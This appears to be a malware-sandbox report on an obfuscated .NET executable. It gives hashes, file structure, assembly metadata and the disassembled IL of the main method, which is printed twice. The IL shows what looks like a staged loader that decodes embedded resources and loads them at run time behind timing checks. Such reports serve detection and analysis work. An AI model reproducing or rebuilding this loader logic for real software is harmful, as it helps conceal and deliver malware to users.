Suspicious
Suspect

db46e796aeb3824eb0f596b3e0e7fd1b

PE Executable
|
MD5: db46e796aeb3824eb0f596b3e0e7fd1b
|
Size: 715.26 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
db46e796aeb3824eb0f596b3e0e7fd1b
Sha1
4725155e6b18d14ed94bcef69a03b48a170d4298
Sha256
39d89923c65fd5f1d9957c9596e0c6fa9626cd24f2a6956639fd161e6bc70ea4
Sha384
06fec9ddf4af51810535c415e1844d4e32c2764d48d9be19cb2310590158e31da4ba11790e3ab3309ff59d7061496656
Sha512
c7e387e2b806148a123f8b159375b116ddb639c380d1481eb552ddd48d9dbf69ba1faa7840d38a3b968f5815b3ba2d4087e44b178458d08481882cdb9cfce57d
SSDeep
12288:Lbg9o2tVX5rVBo83tUsm+u6cgJxPLX4D0zuGDotN3g2S3ROEiI:g9oarVBo6tgNExj4D0Zk5I
TLSH
D5E4AE1123E95B68F5BEAB79957424108BF6F803E736DA9E7D8C44DE0932B80C652733

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
db46e796aeb3824eb0f596b3e0e7fd1b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
dHa5N2bi.g.resources
dHa5N2bi.Resources.resources
6e853af57f851e.Resources.resources
3426095c0
[NBF]root.Data
3426095c1
[NBF]root.Data
3426095c2
[NBF]root.Data
3426095c3
[NBF]root.Data
3426095c4
[NBF]root.Data
3426095c5
[NBF]root.Data
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

dHa5N2bi
Full Name

dHa5N2bi
EntryPoint

System.Void dHa5N2bi.Lk2zt0WwRpo7/Tw8iroP6L1_q.7snPSg9z::dXj58bpFN3_y()
Scope Name

dHa5N2bi
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

dHa5N2bi
Assembly Version

18.15.45.244
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

1347
Main Method

System.Void dHa5N2bi.Lk2zt0WwRpo7/Tw8iroP6L1_q.7snPSg9z::dXj58bpFN3_y()
Main IL Instruction Count

196
Main IL

nop <null> nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> call System.String System.Environment::get_UserName() stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr FocusFlow call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_11 ldloc.s V_11 brfalse.s IL_004A: nop ldloc.3 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> nop <null> nop <null> ldloc.3 <null> ldstr user.config call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_006F: nop ldloc.s V_4 call System.String System.IO.File::ReadAllText(System.String) stloc.s V_13 nop <null> nop <null> ldc.i4.s 26 call System.Int32 System.Math::Abs(System.Int32) stloc.s V_5 ldloca.s V_2 call System.Int64 System.DateTime::get_Ticks() conv.r8 <null> ldc.r8 1E-07 mul <null> call System.Double System.Math::Sin(System.Double) stloc.s V_6 ldloc.s V_5 call System.Object dHa5N2bi.wm6B7xCe/dBo3sq4RnG.sPa2Y4pjb::2rnBa4Qiof7L8(System.Int32) castclass System.Object[] stloc.s V_7 ldstr resources/7190456 ldc.i4.0 <null> newarr System.Object call System.String System.String::Format(System.String,System.Object[]) stloc.s V_8 ldloc.s V_7 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_6 ldc.r8 0.5 cgt <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_00D3: nop ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> nop <null> nop <null> ldloc.s V_7 ldc.i4.2 <null> ldloc.s V_7 ldc.i4.0 <null> ldelem.ref <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] dHa5N2bi.4Qpmw::7e_WfjX3zG(System.String) stelem.ref <null> call System.DateTime System.DateTime::get_UtcNow() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Day() ldc.i4.s 17 mul.ovf <null> ldloc.1 <null> callvirt System.Int32 System.String::get_Length() ldc.i4.3 <null> mul.ovf <null> add.ovf <null> stloc.s V_9 ldloc.s V_7 ldc.i4.3 <null> ldloc.s V_7 ldc.i4.2 <null> ldelem.ref <null> castclass System.Byte[] call System.Byte[] dHa5N2bi.Lk2zt0WwRpo7::Fs3mb(System.Byte[]) stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> isinst System.Byte[] brfalse.s IL_0130: ldc.i4.0 ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldlen <null> conv.i4 <null> ldc.i4.s 100 cgt <null> br.s IL_0131: stloc.s V_16 ldc.i4.0 <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_0151: nop ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.0 <null> ldelem.u1 <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.1 <null> ldelem.u1 <null> xor <null> stloc.s V_17 nop <null> nop <null> ldc.i4.1 <null> stloc.s V_10 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.6 <null> blt.s IL_017A: ldc.i4.1 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.s 22 cgt <null> br.s IL_017B: stloc.s V_18 ldc.i4.1 <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_0185: nop ldc.i4.1 <null> stloc.s V_10 nop <null> nop <null> ldloc.s V_10 stloc.s V_19 ldloc.s V_19 brfalse.s IL_01A3: nop ldstr L o a d ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) call System.Object dHa5N2bi.sy3Sc7Bj/Xd2ek9sQz.nb8CQmy6jm/Mjz5ma.Ld8s0NjkgjF9B::Rkf5j1Ft(System.String,System.Object) pop <null> nop <null> nop <null> ldnull <null> stloc.s V_7 call System.Void System.GC::Collect() nop <null> leave.s IL_01D0: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 nop <null> nop <null> leave.s IL_01C8: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: nop nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01D0: nop nop <null> ret <null>
Module Name

dHa5N2bi
Full Name

dHa5N2bi
EntryPoint

System.Void dHa5N2bi.Lk2zt0WwRpo7/Tw8iroP6L1_q.7snPSg9z::dXj58bpFN3_y()
Scope Name

dHa5N2bi
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

dHa5N2bi
Assembly Version

18.15.45.244
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

1347
Main Method

System.Void dHa5N2bi.Lk2zt0WwRpo7/Tw8iroP6L1_q.7snPSg9z::dXj58bpFN3_y()
Main IL Instruction Count

196
Main IL

nop <null> nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> call System.String System.Environment::get_UserName() stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr FocusFlow call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_11 ldloc.s V_11 brfalse.s IL_004A: nop ldloc.3 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> nop <null> nop <null> ldloc.3 <null> ldstr user.config call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_006F: nop ldloc.s V_4 call System.String System.IO.File::ReadAllText(System.String) stloc.s V_13 nop <null> nop <null> ldc.i4.s 26 call System.Int32 System.Math::Abs(System.Int32) stloc.s V_5 ldloca.s V_2 call System.Int64 System.DateTime::get_Ticks() conv.r8 <null> ldc.r8 1E-07 mul <null> call System.Double System.Math::Sin(System.Double) stloc.s V_6 ldloc.s V_5 call System.Object dHa5N2bi.wm6B7xCe/dBo3sq4RnG.sPa2Y4pjb::2rnBa4Qiof7L8(System.Int32) castclass System.Object[] stloc.s V_7 ldstr resources/7190456 ldc.i4.0 <null> newarr System.Object call System.String System.String::Format(System.String,System.Object[]) stloc.s V_8 ldloc.s V_7 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_6 ldc.r8 0.5 cgt <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_00D3: nop ldc.i4.1 <null> call System.Void System.Threading.Thread::Sleep(System.Int32) nop <null> nop <null> nop <null> ldloc.s V_7 ldc.i4.2 <null> ldloc.s V_7 ldc.i4.0 <null> ldelem.ref <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] dHa5N2bi.4Qpmw::7e_WfjX3zG(System.String) stelem.ref <null> call System.DateTime System.DateTime::get_UtcNow() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Day() ldc.i4.s 17 mul.ovf <null> ldloc.1 <null> callvirt System.Int32 System.String::get_Length() ldc.i4.3 <null> mul.ovf <null> add.ovf <null> stloc.s V_9 ldloc.s V_7 ldc.i4.3 <null> ldloc.s V_7 ldc.i4.2 <null> ldelem.ref <null> castclass System.Byte[] call System.Byte[] dHa5N2bi.Lk2zt0WwRpo7::Fs3mb(System.Byte[]) stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> isinst System.Byte[] brfalse.s IL_0130: ldc.i4.0 ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldlen <null> conv.i4 <null> ldc.i4.s 100 cgt <null> br.s IL_0131: stloc.s V_16 ldc.i4.0 <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_0151: nop ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.0 <null> ldelem.u1 <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.1 <null> ldelem.u1 <null> xor <null> stloc.s V_17 nop <null> nop <null> ldc.i4.1 <null> stloc.s V_10 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.6 <null> blt.s IL_017A: ldc.i4.1 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.s 22 cgt <null> br.s IL_017B: stloc.s V_18 ldc.i4.1 <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_0185: nop ldc.i4.1 <null> stloc.s V_10 nop <null> nop <null> ldloc.s V_10 stloc.s V_19 ldloc.s V_19 brfalse.s IL_01A3: nop ldstr L o a d ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) call System.Object dHa5N2bi.sy3Sc7Bj/Xd2ek9sQz.nb8CQmy6jm/Mjz5ma.Ld8s0NjkgjF9B::Rkf5j1Ft(System.String,System.Object) pop <null> nop <null> nop <null> ldnull <null> stloc.s V_7 call System.Void System.GC::Collect() nop <null> leave.s IL_01D0: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 nop <null> nop <null> leave.s IL_01C8: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: nop nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01D0: nop nop <null> ret <null>
db46e796aeb3824eb0f596b3e0e7fd1b (715.26 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙